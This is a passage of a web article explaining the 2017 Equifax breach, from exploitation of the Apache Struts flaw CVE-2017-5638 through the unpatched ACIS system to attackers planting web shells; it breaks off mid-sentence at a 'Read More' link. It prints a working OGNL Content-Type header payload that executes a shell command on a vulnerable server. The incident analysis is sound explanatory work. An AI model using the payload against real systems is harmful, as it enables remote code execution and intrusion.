Skip to content Skip to footer
0 items - $0.00 0
Menu

How Equifax Was Breached in 2017 by 0x7d0

0CommentsShare Post
How Equifax Was Breached in 2017 by 0x7d0
News

How Equifax Was Breached in 2017 by 0x7d0

September 21, 2023
0Comments
Share This Article
Share Post
Newsletter

Sed ut perspiciatis unde.

Subscribe

Send to HN

On a Saturday night, a security engineer at Equifax was updating an SSL certificate on a Network Intrusion Detection System (NIDS). Immediately after, suspicious connections were detected. After a more in-depth investigation, it became evident that the situation was far graver than anticipated. A service had to be promptly shut down to prevent further exploitation, but by that point, the damage was already done. Malicious actors had been exfiltrating data for several months and had already collected personal information from 163 million customers.

How It Happened

Initial Access

The story begins in March 2017 with the disclosure of a vulnerability in the Apache Struts software, tracked as CVE-2017-5638. This security flaw allowed threat actors to achieve remote code execution on a server by crafting a specific Content-Type HTTP header. This vulnerability was ranked highly critical for its high impact potential and the ease with which it could be exploited.

Here an example running the whoami command on a vulnerable server as detailed in this exploit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

GET /struts2-showcase/ HTTP/1.1
Host: 127.0.0.1
Content-Type: %{
    (#_='multipart/form-data').
    (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).
    (#_memberAccess?
    (#_memberAccess=#dm):
    ((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
    (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
    (#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).
    (#context.setMemberAccess(#dm)))).
    (#cmd=@org.apache.struts2.ServletActionContext@getRequest().getHeader('X-kKph')).
    (#os=@java.lang.System@getProperty('os.name')).
    (#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).
    (#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start())
  }
X-kKph: whoami

Equifax responded by committing to patch all affected applications within 48 hours. They also implemented a detection rule within Snort, their Network Intrusion Detection System (NIDS) and conducted a filesystem scan to identify all systems with a vulnerable version of Apache Struts.

However, one application fell through the cracks, the Automated Consumer Interview System (ACIS). It was a legacy application built in the 1970s that customers used to dispute incorrect credit information. In May 2017, attackers discovered that ACIS was still vulnerable, allowing them to take control of a web server.

The Automated Consumer Interview System (ACIS) The Automated Consumer Interview System (ACIS)

Persistence

Shortly after gaining initial access on ACIS, the attackers dropped Web Shells to maintain their foothold on systems. These Web Shells provided a means for the attackers to interact with the system without the need to repeatedly exploit the Apache Struts vuln

Read More

Tags:
0Likes
Leave a comment

Leave a comment

In the Shadows of Innovation”

© 2025 HackTech.info. All Rights Reserved.

Sign Up to Our Newsletter

Be the first to know the latest updates

Whoops, you're not connected to Mailchimp. You need to enter a valid Mailchimp API key.